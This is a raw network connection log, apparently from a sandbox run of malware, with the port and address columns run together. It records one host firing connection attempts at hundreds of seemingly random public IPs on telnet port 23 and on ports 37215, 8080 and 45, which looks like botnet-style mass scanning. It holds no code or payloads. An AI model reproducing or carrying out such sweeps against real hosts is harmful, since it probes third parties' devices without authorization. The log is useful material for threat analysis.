                                              Nov 23, 2023 05:14:47.992482901 CET4782823192.168.2.1441.133.185.209
                                              Nov 23, 2023 05:14:47.992484093 CET4782823192.168.2.14102.244.240.155
                                              Nov 23, 2023 05:14:47.992621899 CET4782823192.168.2.142.147.70.3
                                              Nov 23, 2023 05:14:47.992621899 CET4782823192.168.2.14221.130.52.196
                                              Nov 23, 2023 05:14:47.992621899 CET4782823192.168.2.14157.133.93.73
                                              Nov 23, 2023 05:14:47.992626905 CET4782823192.168.2.14201.112.122.25
                                              Nov 23, 2023 05:14:47.992628098 CET4782823192.168.2.14197.56.103.98
                                              Nov 23, 2023 05:14:47.992628098 CET4782823192.168.2.14240.199.120.219
                                              Nov 23, 2023 05:14:47.992630959 CET4782823192.168.2.1414.41.184.136
                                              Nov 23, 2023 05:14:47.992630959 CET4782823192.168.2.1486.166.65.10
                                              Nov 23, 2023 05:14:47.992630959 CET4782823192.168.2.14134.248.23.77
                                              Nov 23, 2023 05:14:47.992631912 CET4782823192.168.2.14194.158.36.79
                                              Nov 23, 2023 05:14:47.992630959 CET4782823192.168.2.14132.253.240.212
                                              Nov 23, 2023 05:14:47.992633104 CET4782823192.168.2.14159.59.153.189
                                              Nov 23, 2023 05:14:47.992631912 CET4782823192.168.2.144.97.210.32
                                              Nov 23, 2023 05:14:47.992635965 CET4782823192.168.2.14186.35.125.112
                                              Nov 23, 2023 05:14:47.992635965 CET4782823192.168.2.1447.144.65.53
                                              Nov 23, 2023 05:14:47.992634058 CET4782823192.168.2.14168.141.114.188
                                              Nov 23, 2023 05:14:47.992635965 CET4782823192.168.2.14153.55.178.147
                                              Nov 23, 2023 05:14:47.992635965 CET4782823192.168.2.1479.43.217.40
                                              Nov 23, 2023 05:14:47.992635965 CET4782823192.168.2.1480.12.165.139
                                              Nov 23, 2023 05:14:47.992635965 CET4782823192.168.2.1460.199.207.113
                                              Nov 23, 2023 05:14:47.992636919 CET4782823192.168.2.14168.129.38.131
                                              Nov 23, 2023 05:14:47.992636919 CET4782823192.168.2.1416.197.75.132
                                              Nov 23, 2023 05:14:47.992636919 CET4782823192.168.2.14102.44.112.161
                                              Nov 23, 2023 05:14:47.992660046 CET4782823192.168.2.14120.0.70.191
                                              Nov 23, 2023 05:14:47.992660046 CET4782823192.168.2.14109.195.201.198
                                              Nov 23, 2023 05:14:47.992660046 CET4782823192.168.2.1446.186.80.15
                                              Nov 23, 2023 05:14:47.992670059 CET4782823192.168.2.14199.77.30.212
                                              Nov 23, 2023 05:14:47.992670059 CET4782823192.168.2.14114.240.44.227
                                              Nov 23, 2023 05:14:47.992675066 CET4782823192.168.2.14173.138.143.106
                                              Nov 23, 2023 05:14:47.992681026 CET4782823192.168.2.14120.11.21.123
                                              Nov 23, 2023 05:14:47.992681026 CET4782823192.168.2.14197.21.5.150
                                              Nov 23, 2023 05:14:47.992680073 CET4782823192.168.2.1469.184.253.253
                                              Nov 23, 2023 05:14:47.992681980 CET4782823192.168.2.14154.247.0.30
                                              Nov 23, 2023 05:14:47.992681980 CET4782823192.168.2.1457.217.35.115
                                              Nov 23, 2023 05:14:47.992680073 CET4782823192.168.2.14109.145.194.194
                                              Nov 23, 2023 05:14:47.992681980 CET4782823192.168.2.1444.129.168.88
                                              Nov 23, 2023 05:14:47.992680073 CET4782823192.168.2.1414.58.46.175
                                              Nov 23, 2023 05:14:47.992681026 CET4782823192.168.2.1417.12.7.21
                                              Nov 23, 2023 05:14:47.992687941 CET4782823192.168.2.14143.233.77.63
                                              Nov 23, 2023 05:14:47.992681980 CET4782823192.168.2.14124.122.81.233
                                              Nov 23, 2023 05:14:47.992680073 CET4782823192.168.2.14217.153.73.69
                                              Nov 23, 2023 05:14:47.992681980 CET4782823192.168.2.14223.213.102.67
                                              Nov 23, 2023 05:14:47.992680073 CET4782823192.168.2.1457.183.102.182
                                              Nov 23, 2023 05:14:47.992695093 CET4782823192.168.2.1470.167.104.26
                                              Nov 23, 2023 05:14:47.992687941 CET4782823192.168.2.1498.13.254.149
                                              Nov 23, 2023 05:14:47.992695093 CET4782823192.168.2.14170.159.60.12
                                              Nov 23, 2023 05:14:47.992687941 CET4782823192.168.2.14161.131.70.55
                                              Nov 23, 2023 05:14:47.992697954 CET4782823192.168.2.14193.101.230.241
                                              Nov 23, 2023 05:14:47.992680073 CET4782823192.168.2.14243.71.72.213
                                              Nov 23, 2023 05:14:47.992697954 CET4782823192.168.2.142.171.176.118
                                              Nov 23, 2023 05:14:47.992695093 CET4782823192.168.2.1487.105.128.179
                                              Nov 23, 2023 05:14:47.992697954 CET4782823192.168.2.1453.186.201.36
                                              Nov 23, 2023 05:14:47.992695093 CET4782823192.168.2.14123.249.154.190
                                              Nov 23, 2023 05:14:47.992687941 CET4782823192.168.2.14185.42.107.86
                                              Nov 23, 2023 05:14:47.992702007 CET4782823192.168.2.14201.104.146.171
                                              Nov 23, 2023 05:14:47.992687941 CET4782823192.168.2.14203.179.47.147
                                              Nov 23, 2023 05:14:47.992702007 CET4782823192.168.2.14246.41.90.240
                                              Nov 23, 2023 05:14:47.992695093 CET4782823192.168.2.14154.218.190.246
                                              Nov 23, 2023 05:14:47.992687941 CET4782823192.168.2.14255.15.23.181
                                              Nov 23, 2023 05:14:47.992707968 CET4782823192.168.2.1482.95.199.160
                                              Nov 23, 2023 05:14:47.992695093 CET4782823192.168.2.14202.12.213.184
                                              Nov 23, 2023 05:14:47.992681980 CET4782823192.168.2.1446.168.121.187
                                              Nov 23, 2023 05:14:47.992681980 CET4782823192.168.2.14183.116.232.3
                                              Nov 23, 2023 05:14:47.992681980 CET4782823192.168.2.14192.70.228.104
                                              Nov 23, 2023 05:14:47.992681980 CET4782823192.168.2.14165.13.125.193
                                              Nov 23, 2023 05:14:47.992681980 CET4782823192.168.2.14191.152.99.201
                                              Nov 23, 2023 05:14:47.992681980 CET4782823192.168.2.1419.139.154.216
                                              Nov 23, 2023 05:14:47.992681980 CET4782823192.168.2.14195.116.164.79
                                              Nov 23, 2023 05:14:47.992724895 CET4782823192.168.2.1481.27.249.100
                                              Nov 23, 2023 05:14:47.992726088 CET4782823192.168.2.14158.114.169.127
                                              Nov 23, 2023 05:14:47.992726088 CET4782823192.168.2.14111.154.109.225
                                              Nov 23, 2023 05:14:47.992727041 CET4782823192.168.2.14126.38.242.90
                                              Nov 23, 2023 05:14:47.992741108 CET4782823192.168.2.14122.219.144.4
                                              Nov 23, 2023 05:14:47.992741108 CET4782823192.168.2.1487.221.143.141
                                              Nov 23, 2023 05:14:47.992743969 CET4782823192.168.2.14205.205.26.188
                                              Nov 23, 2023 05:14:47.992743969 CET4782823192.168.2.14116.253.253.29
                                              Nov 23, 2023 05:14:47.992743969 CET4782823192.168.2.14187.189.139.60
                                              Nov 23, 2023 05:14:47.992746115 CET4782823192.168.2.14201.197.1.30
                                              Nov 23, 2023 05:14:47.992764950 CET4782823192.168.2.1457.157.192.187
                                              Nov 23, 2023 05:14:47.992764950 CET4782823192.168.2.14119.114.214.165
                                              Nov 23, 2023 05:14:47.992764950 CET4782823192.168.2.1457.249.76.133
                                              Nov 23, 2023 05:14:47.992794991 CET4782823192.168.2.1439.65.105.29
                                              Nov 23, 2023 05:14:47.992794991 CET4782823192.168.2.14221.156.163.197
                                              Nov 23, 2023 05:14:47.992795944 CET4782823192.168.2.1472.79.232.138
                                              Nov 23, 2023 05:14:47.992795944 CET4782823192.168.2.14155.196.228.135
                                              Nov 23, 2023 05:14:47.992795944 CET4782823192.168.2.1432.196.166.159
                                              Nov 23, 2023 05:14:47.992795944 CET4782823192.168.2.14198.20.18.86
                                              Nov 23, 2023 05:14:47.992795944 CET4782823192.168.2.14114.221.226.178
                                              Nov 23, 2023 05:14:47.992799044 CET4782823192.168.2.14124.0.77.93
                                              Nov 23, 2023 05:14:47.992799044 CET4782823192.168.2.1497.38.168.209
                                              Nov 23, 2023 05:14:47.992799044 CET4782823192.168.2.1434.30.203.2
                                              Nov 23, 2023 05:14:47.992799044 CET4782823192.168.2.1495.42.65.187
                                              Nov 23, 2023 05:14:47.992799044 CET4782823192.168.2.1440.188.14.147
                                              Nov 23, 2023 05:14:47.992799044 CET4782823192.168.2.14250.191.118.148
                                              Nov 23, 2023 05:14:47.992799997 CET4782823192.168.2.1435.189.114.48
                                              Nov 23, 2023 05:14:47.992799997 CET4782823192.168.2.1495.132.187.225
                                              Nov 23, 2023 05:14:47.992832899 CET4782823192.168.2.14108.20.46.250
                                              Nov 23, 2023 05:14:47.992832899 CET4782823192.168.2.14147.129.13.204
                                              Nov 23, 2023 05:14:47.992832899 CET4782823192.168.2.14100.222.172.113
                                              Nov 23, 2023 05:14:47.992832899 CET4782823192.168.2.14189.123.236.17
                                              Nov 23, 2023 05:14:47.992837906 CET4782823192.168.2.14154.101.199.15
                                              Nov 23, 2023 05:14:47.992840052 CET4782823192.168.2.14252.49.190.79
                                              Nov 23, 2023 05:14:47.992840052 CET4782823192.168.2.14247.248.6.22
                                              Nov 23, 2023 05:14:47.992841005 CET4782823192.168.2.1462.149.218.37
                                              Nov 23, 2023 05:14:47.992860079 CET4782823192.168.2.1417.207.99.174
                                              Nov 23, 2023 05:14:47.992860079 CET4782823192.168.2.14120.174.98.200
                                              Nov 23, 2023 05:14:47.992860079 CET4782823192.168.2.14176.103.99.15
                                              Nov 23, 2023 05:14:47.992871046 CET4782823192.168.2.1478.143.165.84
                                              Nov 23, 2023 05:14:47.992873907 CET4782823192.168.2.1476.255.186.218
                                              Nov 23, 2023 05:14:47.992873907 CET4782823192.168.2.14192.114.130.242
                                              Nov 23, 2023 05:14:47.992873907 CET4782823192.168.2.1481.48.173.229
                                              Nov 23, 2023 05:14:47.992882013 CET4782823192.168.2.1427.24.46.45
                                              Nov 23, 2023 05:14:47.992882013 CET4782823192.168.2.14162.126.46.205
                                              Nov 23, 2023 05:14:47.992882013 CET4782823192.168.2.1483.135.196.216
                                              Nov 23, 2023 05:14:47.992882013 CET4782823192.168.2.1420.167.249.153
                                              Nov 23, 2023 05:14:47.992882013 CET4782823192.168.2.1437.73.82.119
                                              Nov 23, 2023 05:14:47.992892027 CET4782823192.168.2.14195.196.187.6
                                              Nov 23, 2023 05:14:47.992892027 CET4782823192.168.2.14153.73.68.168
                                              Nov 23, 2023 05:14:47.992892027 CET4782823192.168.2.14164.25.114.23
                                              Nov 23, 2023 05:14:47.992891073 CET4782823192.168.2.1446.71.151.185
                                              Nov 23, 2023 05:14:47.992892027 CET4782823192.168.2.14122.64.110.58
                                              Nov 23, 2023 05:14:47.992891073 CET4782823192.168.2.14196.158.50.19
                                              Nov 23, 2023 05:14:47.992892027 CET4782823192.168.2.14223.187.66.164
                                              Nov 23, 2023 05:14:47.992891073 CET4782823192.168.2.14243.181.130.181
                                              Nov 23, 2023 05:14:47.992894888 CET4782823192.168.2.14110.18.222.206
                                              Nov 23, 2023 05:14:47.992891073 CET4782823192.168.2.14103.228.98.175
                                              Nov 23, 2023 05:14:47.992894888 CET4782823192.168.2.1498.95.186.135
                                              Nov 23, 2023 05:14:47.992891073 CET4782823192.168.2.14116.96.96.110
                                              Nov 23, 2023 05:14:47.992891073 CET4782823192.168.2.14252.4.65.41
                                              Nov 23, 2023 05:14:47.992898941 CET4782823192.168.2.1446.134.113.40
                                              Nov 23, 2023 05:14:47.992891073 CET4782823192.168.2.14142.34.117.243
                                              Nov 23, 2023 05:14:47.992901087 CET4782823192.168.2.14166.60.192.195
                                              Nov 23, 2023 05:14:48.003562927 CET5006045192.168.2.1474.50.84.203
                                              Nov 23, 2023 05:14:48.004880905 CET4783037215192.168.2.14197.121.211.145
                                              Nov 23, 2023 05:14:48.004936934 CET4783037215192.168.2.14197.172.37.157
                                              Nov 23, 2023 05:14:48.004997015 CET4783037215192.168.2.14156.123.80.145
                                              Nov 23, 2023 05:14:48.005012989 CET4783037215192.168.2.14197.99.68.19
                                              Nov 23, 2023 05:14:48.005059958 CET4783037215192.168.2.1441.166.51.15
                                              Nov 23, 2023 05:14:48.005151033 CET4783037215192.168.2.14197.80.192.155
                                              Nov 23, 2023 05:14:48.005151033 CET4783037215192.168.2.14197.197.3.84
                                              Nov 23, 2023 05:14:48.005152941 CET4783037215192.168.2.14156.154.63.250
                                              Nov 23, 2023 05:14:48.005151033 CET4783037215192.168.2.14156.224.12.71
                                              Nov 23, 2023 05:14:48.005153894 CET4783037215192.168.2.14197.15.236.2
                                              Nov 23, 2023 05:14:48.005152941 CET4783037215192.168.2.14197.187.124.142
                                              Nov 23, 2023 05:14:48.005153894 CET4783037215192.168.2.14156.117.233.218
                                              Nov 23, 2023 05:14:48.005156994 CET4783037215192.168.2.1441.165.2.33
                                              Nov 23, 2023 05:14:48.005156994 CET4783037215192.168.2.1441.2.122.90
                                              Nov 23, 2023 05:14:48.005167007 CET4783037215192.168.2.1441.88.16.59
                                              Nov 23, 2023 05:14:48.005170107 CET4783037215192.168.2.14156.15.231.45
                                              Nov 23, 2023 05:14:48.005170107 CET4783037215192.168.2.1441.195.119.199
                                              Nov 23, 2023 05:14:48.005182028 CET4783037215192.168.2.1441.134.79.11
                                              Nov 23, 2023 05:14:48.005182981 CET4783037215192.168.2.1441.38.129.117
                                              Nov 23, 2023 05:14:48.005182981 CET4783037215192.168.2.14156.151.29.152
                                              Nov 23, 2023 05:14:48.005184889 CET4783037215192.168.2.14197.249.58.104
                                              Nov 23, 2023 05:14:48.005184889 CET4783037215192.168.2.1441.209.75.22
                                              Nov 23, 2023 05:14:48.005186081 CET4783037215192.168.2.14156.208.132.161
                                              Nov 23, 2023 05:14:48.005186081 CET4783037215192.168.2.14156.103.199.52
                                              Nov 23, 2023 05:14:48.005184889 CET4783037215192.168.2.14197.109.92.169
                                              Nov 23, 2023 05:14:48.005186081 CET4783037215192.168.2.1441.207.202.240
                                              Nov 23, 2023 05:14:48.005187988 CET4783037215192.168.2.1441.79.192.50
                                              Nov 23, 2023 05:14:48.005186081 CET4783037215192.168.2.14156.232.225.235
                                              Nov 23, 2023 05:14:48.005184889 CET4783037215192.168.2.14156.96.81.2
                                              Nov 23, 2023 05:14:48.005189896 CET4783037215192.168.2.14197.134.204.33
                                              Nov 23, 2023 05:14:48.005187988 CET4783037215192.168.2.14197.203.174.213
                                              Nov 23, 2023 05:14:48.005207062 CET4783037215192.168.2.14197.204.225.82
                                              Nov 23, 2023 05:14:48.005207062 CET4783037215192.168.2.14197.193.10.55
                                              Nov 23, 2023 05:14:48.005207062 CET4783037215192.168.2.14197.92.95.213
                                              Nov 23, 2023 05:14:48.005207062 CET4783037215192.168.2.14156.176.132.116
                                              Nov 23, 2023 05:14:48.005211115 CET4783037215192.168.2.14197.166.153.43
                                              Nov 23, 2023 05:14:48.005228043 CET4783037215192.168.2.14197.56.16.5
                                              Nov 23, 2023 05:14:48.005230904 CET4783037215192.168.2.1441.213.39.70
                                              Nov 23, 2023 05:14:48.005233049 CET4783037215192.168.2.14197.78.80.52
                                              Nov 23, 2023 05:14:48.005233049 CET4783037215192.168.2.14197.71.85.143
                                              Nov 23, 2023 05:14:48.005269051 CET4783037215192.168.2.14156.127.103.188
                                              Nov 23, 2023 05:14:48.005309105 CET4783037215192.168.2.1441.94.158.108
                                              Nov 23, 2023 05:14:48.005314112 CET4783037215192.168.2.14156.18.83.31
                                              Nov 23, 2023 05:14:48.005331039 CET4783037215192.168.2.14156.24.201.28
                                              Nov 23, 2023 05:14:48.005331993 CET4783037215192.168.2.1441.160.222.165
                                              Nov 23, 2023 05:14:48.005331993 CET4783037215192.168.2.1441.246.79.25
                                              Nov 23, 2023 05:14:48.005332947 CET4783037215192.168.2.14156.187.113.108
                                              Nov 23, 2023 05:14:48.005332947 CET4783037215192.168.2.1441.24.144.199
                                              Nov 23, 2023 05:14:48.005335093 CET4783037215192.168.2.1441.246.229.20
                                              Nov 23, 2023 05:14:48.005336046 CET4783037215192.168.2.14156.15.56.22
                                              Nov 23, 2023 05:14:48.005336046 CET4783037215192.168.2.1441.210.55.224
                                              Nov 23, 2023 05:14:48.005336046 CET4783037215192.168.2.14156.69.70.180
                                              Nov 23, 2023 05:14:48.005336046 CET4783037215192.168.2.14197.25.150.137
                                              Nov 23, 2023 05:14:48.005340099 CET4783037215192.168.2.14197.77.136.4
                                              Nov 23, 2023 05:14:48.005340099 CET4783037215192.168.2.1441.230.150.51
                                              Nov 23, 2023 05:14:48.005340099 CET4783037215192.168.2.14156.59.35.246
                                              Nov 23, 2023 05:14:48.005340099 CET4783037215192.168.2.14197.69.27.33
                                              Nov 23, 2023 05:14:48.005340099 CET4783037215192.168.2.14197.199.76.7
                                              Nov 23, 2023 05:14:48.005340099 CET4783037215192.168.2.1441.250.204.254
                                              Nov 23, 2023 05:14:48.005351067 CET4783037215192.168.2.1441.37.11.185
                                              Nov 23, 2023 05:14:48.005351067 CET4783037215192.168.2.1441.46.79.180
                                              Nov 23, 2023 05:14:48.005351067 CET4783037215192.168.2.14156.69.140.35
                                              Nov 23, 2023 05:14:48.005352020 CET4783037215192.168.2.1441.134.104.238
                                              Nov 23, 2023 05:14:48.005352020 CET4783037215192.168.2.1441.151.214.94
                                              Nov 23, 2023 05:14:48.005352020 CET4783037215192.168.2.14156.2.168.117
                                              Nov 23, 2023 05:14:48.005354881 CET4783037215192.168.2.14197.71.32.157
                                              Nov 23, 2023 05:14:48.005356073 CET4783037215192.168.2.14156.147.159.113
                                              Nov 23, 2023 05:14:48.005354881 CET4783037215192.168.2.14197.193.237.108
                                              Nov 23, 2023 05:14:48.005354881 CET4783037215192.168.2.14156.187.49.42
                                              Nov 23, 2023 05:14:48.005356073 CET4783037215192.168.2.14156.140.30.9
                                              Nov 23, 2023 05:14:48.005356073 CET4783037215192.168.2.1441.175.184.223
                                              Nov 23, 2023 05:14:48.005367041 CET4783037215192.168.2.1441.133.29.47
                                              Nov 23, 2023 05:14:48.005369902 CET4783037215192.168.2.14156.21.108.155
                                              Nov 23, 2023 05:14:48.005373001 CET4783037215192.168.2.14156.248.142.148
                                              Nov 23, 2023 05:14:48.005373001 CET4783037215192.168.2.14156.139.41.211
                                              Nov 23, 2023 05:14:48.005381107 CET4783037215192.168.2.1441.138.115.132
                                              Nov 23, 2023 05:14:48.005381107 CET4783037215192.168.2.14197.123.112.158
                                              Nov 23, 2023 05:14:48.005383015 CET4783037215192.168.2.1441.199.183.62
                                              Nov 23, 2023 05:14:48.005383968 CET4783037215192.168.2.1441.244.237.36
                                              Nov 23, 2023 05:14:48.005387068 CET4783037215192.168.2.1441.201.87.12
                                              Nov 23, 2023 05:14:48.005392075 CET4783037215192.168.2.14156.98.251.144
                                              Nov 23, 2023 05:14:48.005400896 CET4783037215192.168.2.14197.113.47.60
                                              Nov 23, 2023 05:14:48.005400896 CET4783037215192.168.2.14156.2.66.16
                                              Nov 23, 2023 05:14:48.005405903 CET4783037215192.168.2.1441.101.184.158
                                              Nov 23, 2023 05:14:48.005419016 CET4783037215192.168.2.14156.58.65.67
                                              Nov 23, 2023 05:14:48.005422115 CET4783037215192.168.2.1441.151.76.188
                                              Nov 23, 2023 05:14:48.005426884 CET4783037215192.168.2.14156.190.170.118
                                              Nov 23, 2023 05:14:48.005518913 CET4783037215192.168.2.14156.189.173.53
                                              Nov 23, 2023 05:14:48.005518913 CET4783037215192.168.2.14156.136.176.60
                                              Nov 23, 2023 05:14:48.005518913 CET4783037215192.168.2.14156.88.219.88
                                              Nov 23, 2023 05:14:48.005518913 CET4783037215192.168.2.14197.92.212.239
                                              Nov 23, 2023 05:14:48.005520105 CET4783037215192.168.2.1441.119.166.11
                                              Nov 23, 2023 05:14:48.005522013 CET4783037215192.168.2.14197.179.88.99
                                              Nov 23, 2023 05:14:48.005518913 CET4783037215192.168.2.14156.62.46.166
                                              Nov 23, 2023 05:14:48.005520105 CET4783037215192.168.2.1441.55.246.208
                                              Nov 23, 2023 05:14:48.005522966 CET4783037215192.168.2.1441.175.86.38
                                              Nov 23, 2023 05:14:48.005543947 CET4783037215192.168.2.14197.77.71.30
                                              Nov 23, 2023 05:14:48.005543947 CET4783037215192.168.2.14197.172.140.165
                                              Nov 23, 2023 05:14:48.005547047 CET4783037215192.168.2.1441.193.26.184
                                              Nov 23, 2023 05:14:48.005547047 CET4783037215192.168.2.1441.98.139.150
                                              Nov 23, 2023 05:14:48.005547047 CET4783037215192.168.2.14197.145.225.130
                                              Nov 23, 2023 05:14:48.005547047 CET4783037215192.168.2.1441.129.10.187
                                              Nov 23, 2023 05:14:48.005547047 CET4783037215192.168.2.1441.247.209.137
                                              Nov 23, 2023 05:14:48.005549908 CET4783037215192.168.2.14197.201.8.90
                                              Nov 23, 2023 05:14:48.005551100 CET4783037215192.168.2.14197.9.190.94
                                              Nov 23, 2023 05:14:48.005551100 CET4783037215192.168.2.1441.184.122.222
                                              Nov 23, 2023 05:14:48.005551100 CET4783037215192.168.2.14156.102.11.247
                                              Nov 23, 2023 05:14:48.005551100 CET4783037215192.168.2.14197.35.86.216
                                              Nov 23, 2023 05:14:48.005552053 CET4783037215192.168.2.14156.247.25.138
                                              Nov 23, 2023 05:14:48.005553007 CET4783037215192.168.2.1441.229.20.166
                                              Nov 23, 2023 05:14:48.005552053 CET4783037215192.168.2.14156.159.61.225
                                              Nov 23, 2023 05:14:48.005551100 CET4783037215192.168.2.1441.201.144.141
                                              Nov 23, 2023 05:14:48.005553007 CET4783037215192.168.2.14156.246.33.198
                                              Nov 23, 2023 05:14:48.005553007 CET4783037215192.168.2.1441.56.238.118
                                              Nov 23, 2023 05:14:48.005553007 CET4783037215192.168.2.14197.43.250.54
                                              Nov 23, 2023 05:14:48.005553007 CET4783037215192.168.2.14197.153.2.29
                                              Nov 23, 2023 05:14:48.005568027 CET4783037215192.168.2.14156.135.96.104
                                              Nov 23, 2023 05:14:48.005568027 CET4783037215192.168.2.1441.185.162.173
                                              Nov 23, 2023 05:14:48.005568027 CET4783037215192.168.2.1441.177.107.227
                                              Nov 23, 2023 05:14:48.005568027 CET4783037215192.168.2.14156.210.142.205
                                              Nov 23, 2023 05:14:48.005568027 CET4783037215192.168.2.1441.125.63.206
                                              Nov 23, 2023 05:14:48.005568027 CET4783037215192.168.2.14197.25.29.244
                                              Nov 23, 2023 05:14:48.005570889 CET4783037215192.168.2.14197.187.103.230
                                              Nov 23, 2023 05:14:48.005570889 CET4783037215192.168.2.14156.131.217.146
                                              Nov 23, 2023 05:14:48.005570889 CET4783037215192.168.2.14156.169.68.249
                                              Nov 23, 2023 05:14:48.005570889 CET4783037215192.168.2.14197.222.22.253
                                              Nov 23, 2023 05:14:48.005573034 CET4783037215192.168.2.14197.185.54.11
                                              Nov 23, 2023 05:14:48.005573034 CET4783037215192.168.2.14156.195.214.250
                                              Nov 23, 2023 05:14:48.005578995 CET4783037215192.168.2.1441.81.14.86
                                              Nov 23, 2023 05:14:48.005583048 CET4783037215192.168.2.1441.189.91.58
                                              Nov 23, 2023 05:14:48.005583048 CET4783037215192.168.2.14156.122.34.66
                                              Nov 23, 2023 05:14:48.005584955 CET4783037215192.168.2.1441.231.90.192
                                              Nov 23, 2023 05:14:48.005584955 CET4783037215192.168.2.14197.64.111.137
                                              Nov 23, 2023 05:14:48.005584955 CET4783037215192.168.2.1441.38.44.46
                                              Nov 23, 2023 05:14:48.005589008 CET4783037215192.168.2.1441.131.25.98
                                              Nov 23, 2023 05:14:48.005589962 CET4783037215192.168.2.14156.110.252.230
                                              Nov 23, 2023 05:14:48.005589962 CET4783037215192.168.2.14156.38.131.30
                                              Nov 23, 2023 05:14:48.005593061 CET4783037215192.168.2.14156.163.32.133
                                              Nov 23, 2023 05:14:48.005593061 CET4783037215192.168.2.14156.139.106.208
                                              Nov 23, 2023 05:14:48.005618095 CET4783037215192.168.2.1441.184.29.179
                                              Nov 23, 2023 05:14:48.005619049 CET4783037215192.168.2.14156.190.80.129
                                              Nov 23, 2023 05:14:48.005621910 CET4783037215192.168.2.1441.202.118.2
                                              Nov 23, 2023 05:14:48.005621910 CET4783037215192.168.2.14197.92.155.84
                                              Nov 23, 2023 05:14:48.005695105 CET4783037215192.168.2.14156.200.172.55
                                              Nov 23, 2023 05:14:48.005695105 CET4783037215192.168.2.14197.122.255.3
                                              Nov 23, 2023 05:14:48.005697012 CET4783037215192.168.2.1441.6.237.102
                                              Nov 23, 2023 05:14:48.005697966 CET4783037215192.168.2.14156.226.147.158
                                              Nov 23, 2023 05:14:48.005698919 CET4783037215192.168.2.1441.183.137.1
                                              Nov 23, 2023 05:14:48.005698919 CET4783037215192.168.2.14156.57.146.226
                                              Nov 23, 2023 05:14:48.005698919 CET4783037215192.168.2.1441.15.61.67
                                              Nov 23, 2023 05:14:48.005705118 CET4783037215192.168.2.14156.138.37.96
                                              Nov 23, 2023 05:14:48.005705118 CET4783037215192.168.2.14156.161.160.151
                                              Nov 23, 2023 05:14:48.005712032 CET4783037215192.168.2.14156.222.100.126
                                              Nov 23, 2023 05:14:48.005712032 CET4783037215192.168.2.1441.17.175.26
                                              Nov 23, 2023 05:14:48.005712986 CET4783037215192.168.2.14197.9.82.234
                                              Nov 23, 2023 05:14:48.005713940 CET4783037215192.168.2.1441.115.47.238
                                              Nov 23, 2023 05:14:48.005716085 CET4783037215192.168.2.14197.192.195.90
                                              Nov 23, 2023 05:14:48.005722046 CET4783037215192.168.2.1441.224.167.48
                                              Nov 23, 2023 05:14:48.005745888 CET4783037215192.168.2.14197.35.125.29
                                              Nov 23, 2023 05:14:48.005745888 CET4783037215192.168.2.1441.148.33.245
                                              Nov 23, 2023 05:14:48.018695116 CET478168080192.168.2.1495.126.83.150
                                              Nov 23, 2023 05:14:48.018749952 CET478168080192.168.2.1462.75.180.144
                                              Nov 23, 2023 05:14:48.018807888 CET478168080192.168.2.1431.159.122.0
                                              Nov 23, 2023 05:14:48.018846989 CET478168080192.168.2.1494.38.54.164
                                              Nov 23, 2023 05:14:48.018862963 CET478168080192.168.2.1495.170.178.213
                                              Nov 23, 2023 05:14:48.018867016 CET478168080192.168.2.1494.13.190.37
                                              Nov 23, 2023 05:14:48.018882990 CET478168080192.168.2.1462.219.46.253
                                              Nov 23, 2023 05:14:48.018899918 CET478168080192.168.2.1431.141.178.50
                                              Nov 23, 2023 05:14:48.018923998 CET478168080192.168.2.1485.225.78.184
                                              Nov 23, 2023 05:14:48.018940926 CET478168080192.168.2.1462.199.75.249
                                              Nov 23, 2023 05:14:48.018943071 CET478168080192.168.2.1431.155.123.210
                                              Nov 23, 2023 05:14:48.018958092 CET478168080192.168.2.1494.149.168.137
                                              Nov 23, 2023 05:14:48.018959999 CET478168080192.168.2.1485.142.13.40
                                              Nov 23, 2023 05:14:48.018961906 CET478168080192.168.2.1431.178.166.45
                                              Nov 23, 2023 05:14:48.018980026 CET478168080192.168.2.1462.245.47.161
                                              Nov 23, 2023 05:14:48.018987894 CET478168080192.168.2.1462.137.103.32
                                              Nov 23, 2023 05:14:48.018989086 CET478168080192.168.2.1495.246.200.136
                                              Nov 23, 2023 05:14:48.018990993 CET478168080192.168.2.1431.242.41.226
                                              Nov 23, 2023 05:14:48.018989086 CET478168080192.168.2.1494.157.150.206
                                              Nov 23, 2023 05:14:48.019005060 CET478168080192.168.2.1462.247.132.11
                                              Nov 23, 2023 05:14:48.019011021 CET478168080192.168.2.1462.133.190.130
                                              Nov 23, 2023 05:14:48.019017935 CET478168080192.168.2.1485.219.230.232
                                              Nov 23, 2023 05:14:48.019017935 CET478168080192.168.2.1495.247.45.61
                                              Nov 23, 2023 05:14:48.019017935 CET478168080192.168.2.1431.240.146.97
                                              Nov 23, 2023 05:14:48.019017935 CET478168080192.168.2.1431.106.28.2
                                              Nov 23, 2023 05:14:48.019028902 CET478168080192.168.2.1494.126.46.107
                                              Nov 23, 2023 05:14:48.019045115 CET478168080192.168.2.1431.223.185.239
                                              Nov 23, 2023 05:14:48.019062996 CET478168080192.168.2.1495.15.1.233
                                              Nov 23, 2023 05:14:48.019078970 CET478168080192.168.2.1431.240.153.124
                                              Nov 23, 2023 05:14:48.019119024 CET478168080192.168.2.1494.200.64.225
                                              Nov 23, 2023 05:14:48.019119024 CET478168080192.168.2.1462.154.233.50
                                              Nov 23, 2023 05:14:48.019126892 CET478168080192.168.2.1462.237.21.197
                                              Nov 23, 2023 05:14:48.019129038 CET478168080192.168.2.1485.99.135.211
                                              Nov 23, 2023 05:14:48.019129038 CET478168080192.168.2.1485.115.209.167
                                              Nov 23, 2023 05:14:48.019131899 CET478168080192.168.2.1431.209.26.14
                                              Nov 23, 2023 05:14:48.019131899 CET478168080192.168.2.1485.77.87.46
                                              Nov 23, 2023 05:14:48.019131899 CET478168080192.168.2.1431.60.223.178
                                              Nov 23, 2023 05:14:48.019131899 CET478168080192.168.2.1462.12.187.84
                                              Nov 23, 2023 05:14:48.019136906 CET478168080192.168.2.1495.36.141.140
                                              Nov 23, 2023 05:14:48.019138098 CET478168080192.168.2.1431.208.79.212
                                              Nov 23, 2023 05:14:48.019139051 CET478168080192.168.2.1485.49.131.229
                                              Nov 23, 2023 05:14:48.019155025 CET478168080192.168.2.1495.31.154.244
                                              Nov 23, 2023 05:14:48.019160986 CET478168080192.168.2.1495.3.121.57
                                              Nov 23, 2023 05:14:48.019160986 CET478168080192.168.2.1485.141.216.135
                                              Nov 23, 2023 05:14:48.019164085 CET478168080192.168.2.1431.163.222.78
                                              Nov 23, 2023 05:14:48.019166946 CET478168080192.168.2.1431.107.119.5
                                              Nov 23, 2023 05:14:48.019177914 CET478168080192.168.2.1431.255.66.218
                                              Nov 23, 2023 05:14:48.019177914 CET478168080192.168.2.1462.154.68.148
                                              Nov 23, 2023 05:14:48.019181013 CET478168080192.168.2.1462.199.249.114
                                              Nov 23, 2023 05:14:48.019181967 CET478168080192.168.2.1494.207.217.214
